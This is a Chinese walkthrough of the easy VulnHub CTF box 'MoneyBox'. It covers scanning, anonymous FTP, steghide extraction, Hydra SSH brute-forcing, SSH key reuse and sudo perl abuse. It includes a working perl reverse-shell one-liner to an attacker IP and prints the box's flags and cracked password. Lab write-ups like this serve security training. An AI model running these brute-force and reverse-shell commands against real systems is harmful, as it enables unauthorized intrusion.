MoneyBox

0x00.简述

Difficulty : Easy

Goal : 3 flags

一台CTF风靶机。veryveryvery~ez

0x01.主机发现

由于是仅主机网络，所以使用arp扫描即可发现。如下，1是网关，100是DHCP服务器，所以103就是靶机IP地址。

┌──(kali㉿kali)-[~]
└─$ sudo arp-scan 192.168.56.1/24                                                1 ⨯
[sudo] password for kali: 
Interface: eth0, type: EN10MB, MAC: 08:00:27:43:73:bc, IPv4: 192.168.56.104
WARNING: host part of 192.168.56.1/24 is non-zero
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:0e       (Unknown: locally administered)
192.168.56.100  08:00:27:59:03:27       PCS Systemtechnik GmbH
192.168.56.103  08:00:27:0f:86:5f       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.133 seconds (120.02 hosts/sec). 3 responded

0x02.信息收集

发现了IP地址，接下来进行端口扫描。

┌──(kali㉿kali)-[~]
└─$ sudo nmap -p- 192.168.56.103   
[sudo] password for kali: 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-26 02:02 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.103
Host is up (0.00052s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:0F:86:5F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.12 seconds

可以看到开放了21、22、80端口，接下来进行banner收集，查看每个端口对应的服务及版本信息。

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV 192.168.56.103 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-26 02:07 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.103
Host is up (0.00015s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
MAC Address: 08:00:27:0F:86:5F (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.97 seconds

获取到banner信息后，可以使用-sC参数对各个端口进行默认脚本扫描，这里可以看到21端口对应的FTP服务可以进行匿名登入

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -p21,22,80 192.168.56.103
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-26 02:09 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.103
Host is up (0.00045s latency).

PORT   STATE SERVICE
21/tcp open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0         1093656 Feb 26  2021 trytofind.jpg
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.104
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh
| ssh-hostkey: 
|   2048 1e:30:ce:72:81:e0:a2:3d:5c:28:88:8b:12:ac:fa:ac (RSA)
|   256 01:9d:fa:fb:f2:06:37:c0:12:fc:01:8b:24:8f:53:ae (ECDSA)
|_  256 2f:34:b3:d0:74:b4:7f:8d:17:d2:37:b1:2e:32:f7:eb (ED25519)
80/tcp open  http
|_http-title: MoneyBox
MAC Address: 08:00:27:0F:86:5F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.02 seconds

0x03.FTP匿名登入

之前获取到了FTP服务存在匿名登入，所以接下来进行登入

┌──(kali㉿kali)-[~]
└─$ ftp 192.168.56.103
Connected to 192.168.56.103.
220 (vsFTPd 3.0.3)
Name (192.168.56.103:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

尝试切换目录与查看文件。可以看到不能切换目录，且只有一个jpg图片，名字为trytofind视乎是在提示我们什么。

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0         1093656 Feb 26  2021 trytofind.jpg
226 Directory send OK.
ftp> pwd
257 "/" is the current directory
ftp> cd /
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0         1093656 Feb 26  2021 trytofind.jpg
226 Directory send OK.
ftp>

下载trytofind.jpg进行分析，图片如下，没什么可用信息！(其实还有，下一步再说:)

ftp> get trytofind.jpg
local: trytofind.jpg remote: trytofind.jpg
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for trytofind.jpg (1093656 bytes).
226 Transfer complete.
1093656 bytes received in 0.05 secs (21.3356 MB/s)

0x04.访问http服务

前面发现了80端口，所以这里访问http服务看看是否有利用的信息

只是一个静态页面，源码也没发现什么，接下来，扫描目录

┌──(kali㉿kali)-[~]
└─$ dirb http://192.168.56.103                                                        255 ⨯

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Oct 26 03:09:37 2021
URL_BASE: http://192.168.56.103/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.103/ ----
==> DIRECTORY: http://192.168.56.103/blogs/                                                
+ http://192.168.56.103/index.html (CODE:200|SIZE:621)                                     
+ http://192.168.56.103/server-status (CODE:403|SIZE:279)                                  
                                                                                           
---- Entering directory: http://192.168.56.103/blogs/ ----
+ http://192.168.56.103/blogs/index.html (CODE:200|SIZE:353)                               
                                                                                           
-----------------
END_TIME: Tue Oct 26 03:09:41 2021
DOWNLOADED: 9224 - FOUND: 3

发现了blogs目录，访问它。查看源码，发现一个秘密的目录，继续访问它！

这里发现一个密钥(3xtr4ctd4t4)，先留着

0x05.查看图片里隐写的信息

到这里，我们的测试似乎遇到了瓶颈期，但给我们的hint却是(这是一个非常容易的靶机，不要想太多)，接下来继续以图片为突破点！

使用strings查看图片中的字符串信息

┌──(kali㉿kali)-[~]
└─$ strings trytofind.jpg | head -n 15
JFIF
 , #&')*)
-0-(0%()(
((((((((((((((((((((((((((((((((((((((((((((((((((
$3br
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
        #3R
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
p=*5$
\sH@
 "PCv
N' g
.}F1@
@#u-
}h_n

可以看到，这并不是一个正常的图片头，使用steghide查看图片信息，这里便使用到了前面发现的密钥(3xtr4ctd4t4)

┌──(kali㉿kali)-[~]
└─$ steghide info trytofind.jpg 
"trytofind.jpg":
  format: jpeg
  capacity: 64.2 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
  embedded file "data.txt":
    size: 136.0 Byte
    encrypted: no
    compressed: no

可以看到图片中存在一个data.txt文件，把他提取出来。根据提示，renu用户存在弱口令

┌──(kali㉿kali)-[~]
└─$ steghide extract -sf trytofind.jpg
Enter passphrase: 
wrote extracted data to "data.txt".
                                                                                            
┌──(kali㉿kali)-[~]
└─$ cat data.txt     
Hello.....  renu

      I tell you something Important.Your Password is too Week So Change Your Password
Don't Underestimate it.......

                              

0x06.爆破renu

根据提示信息，对renu进行爆破，得到密码为987654321

┌──(kali㉿kali)-[~]
└─$ hydra -l renu -P ./rockyou.txt ssh://192.168.56.103
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-10-26 04:00:35
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.103:22/
[22][ssh] host: 192.168.56.103   login: renu   password: 987654321
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 5 final worker threads did not complete until end.
[ERROR] 5 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-10-26 04:00:56

ssh登入，这样就得到了第一条flag

┌──(kali㉿kali)-[~]
└─$ ssh renu@192.168.56.103                                                           255 ⨯
The authenticity of host '192.168.56.103 (192.168.56.103)' can't be established.
ECDSA key fingerprint is SHA256:8GzSoXjLv35yJ7cQf1EE0rFBb9kLK/K1hAjzK/IXk8I.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.103' (ECDSA) to the list of known hosts.
renu@192.168.56.103's password: 
Linux MoneyBox 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Feb 26 08:53:43 2021 from 192.168.43.44
renu@MoneyBox:~$ ls
ftp  user1.txt
renu@MoneyBox:~$ cat user1.txt 
Yes...!
You Got it User1 Flag

 ==> us3r1{F14g:0ku74tbd3777y4}

0x07.切换到lily用户

登入到renu用户后，查看renu是否有sudo权限，进行提权，可惜他没有。但查看history可以发现一些利用信息

renu@MoneyBox:~$ sudo -s
[sudo] password for renu: 
renu is not in the sudoers file.  This incident will be reported.
renu@MoneyBox:~$ history 
    1  cler
    2  ls
    3  ls -la
    4  cd /home
    5  ls
    6  clear
    7  cd
    8  ls
    9  ls -la
   10  exit
   11  clear
   12  ls
   13  ls -la
   14  cd /home
   15  ls
   16  cd lily
   17  ls
   18  ls -la
   19  clear
   20  cd
   21  clear
   22  ssh-keygen -t rsa
   23  clear
   24  cd .ssh
   25  ls
   26  ssh-copy-id lily@192.168.43.80
   27  clear
   28  cd
   29  cd -
   30  ls -l
   31  chmod 400 id_rsa
   32  ls -l
   33  ssh -i id_rsa lily@192.168.43.80
   34  clear
   35  ssh -i id_rsa lily@192.168.43.80
   36  cd
   37  clear
   38  cd .ssh/
   39  ls
   40  ssh -i id_rsa lily@192.168.43.80
   41  su lily
   42  clear
   43  cd
   44  sudo apt install openssh
   45  sudo apt update
   46  sudo apt install openssh-server
   47  sudo service ssh start
   48  sudo service ssh status
   49  clear
   50  cd /etc/
   51  ls
   52  cd ssh
   53  ls
   54  nano ssh_config 
   55  ls
   56  nano sshd_config 
   57  clear
   58  cd
   59  ls
   60  ls -la
   61  chsh bash
   62  chsh
   63  clear
   64  su root
   65  clear
   66  sudo apt install openssh
   67  su root
   68  exit
   69  ls
   70  cat user1.txt 
renu@MoneyBox:~$

根据历史信息，我们可以发现，renu用户生成了ssh公钥并复制到了lily用户的.ssh目录下，接着renu使用私钥登入到了lily用户下。并且当前服务器也存在一个lily用户，那么我们发现的lily用户是否是当前服务器上的lily呢？答案是YES。登入后得到第二个flag

renu@MoneyBox:~/.ssh$ ssh -i id_rsa lily@192.168.56.103
Linux MoneyBox 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Oct 24 06:32:41 2021 from 192.168.56.103
lily@MoneyBox:~$ whoami
lily
lily@MoneyBox:~$ id
uid=1000(lily) gid=1000(lily) groups=1000(lily),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
lily@MoneyBox:~$ ls
user2.txt
lily@MoneyBox:~$ cat user2.txt 
Yeah.....
You Got a User2 Flag

==> us3r{F14g:tr5827r5wu6nklao}

lily@MoneyBox:~$

0x08.提权

根据vulnhub的套路，第三个flag一定在root用户下。查看history，发现lily用户查找过具有suid权限的文件，但是并没有。然而lily用户存在sudo权限

lily@MoneyBox:~$ history 
    1  whoami
    2  exit
    3  sudo -l
    4  clear
    5  find / -type f -user lily -perm 4000
    6  find / -type f -user lily -perm 4000 2>/dev/null
    7  find / -type f -user root -perm 4000 2>/dev/null
    8  exit
    9  find / -type f -user root -perm 4000 2>/dev/null
   10  find / -type f -user lily -perm 4000 2>/dev/null
   11  find / -type f -user lily -perm 4000 
   12  clear
   13  find / -type f -user lily -perm 4000 2>/dev/null
   14  exit
   15  find / -type f -user lily -perm 4000 2>/dev/null
   16  find / -type f -root lily -perm 4000 2>/dev/null
   17  sudo -l
   18  clear
   19  exit
   20  sudo -l
   21  clear
   22  exit
   23  cd
   24  clear
   25  su renu
   26  clear
   27  cd /usr/bin/
   28  ls
   29  ls ping
   30  ls -l ping
   31  chmod u+s ping
   32  chmod -u+s ping
   33  ls -l ping
   34  sudo chmod -u+s ping
   35  ls -l ping
   36  sudo chmod u+r ping
   37  sudo chmod u+w ping
   38  ls -l ping
   39  sudo chmod g-s ping
   40  ls -l ping
   41  apt update
   42  sudo apt update
   43  ls
   44  ls -l whoami
   45  sudo chmod 400 ping
   46  sudo chmod u+x ping
   47  ls -l ping
   48  clear
   49  cd
   50  cd /etc/
   51  nano sudoers
   52  sudo nano sudoers
   53  cd /usr/bin
   54  ls nano
   55  ls more
   56  clear
   57  cd /etc/
   58  sudo nano sudoers
   59  su root
   60  ls
   61  ls -la
   62  clear
   63  ls -la
   64  nano user2.txt
   65  ls
   66  cat user2.txt 
   67  exit
   68  ls
   69  cat user2.txt 
   70  exit
   71  whoami
   72  id
   73  ls
   74  cat user2.txt 
   75  sudo -s
   76  history 
lily@MoneyBox:~$

查看lily用户具有sudo权限的命令，可以发现perl

lily@MoneyBox:~$ sudo -l
Matching Defaults entries for lily on MoneyBox:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lily may run the following commands on MoneyBox:
    (ALL : ALL) NOPASSWD: /usr/bin/perl

perl反弹shell

┌──(kali㉿kali)-[~]
└─$ nc -nvlp 6666
listening on [any] 6666 ...

perl -e 'use Socket;$i="192.168.56.104";$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

得到shell，获得第三个flag

┌──(kali㉿kali)-[~]
└─$ nc -nvlp 6666                                                                       1 ⨯
listening on [any] 6666 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.103] 43008
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# ls 
user2.txt
# pwd
/home/lily
# cd /root
# ls -l
total 0
# ls -la
total 28
drwx------  3 root root 4096 Feb 26  2021 .
drwxr-xr-x 18 root root 4096 Feb 25  2021 ..
-rw-------  1 root root 2097 Feb 26  2021 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x  3 root root 4096 Feb 25  2021 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root  228 Feb 26  2021 .root.txt
# cat .root.txt

Congratulations.......!

You Successfully completed MoneyBox

Finally The Root Flag
    ==> r00t{H4ckth3p14n3t}

I'm Kirthik-KarvendhanT
    It's My First CTF Box
         
instagram : ____kirthik____

See You Back....
       
#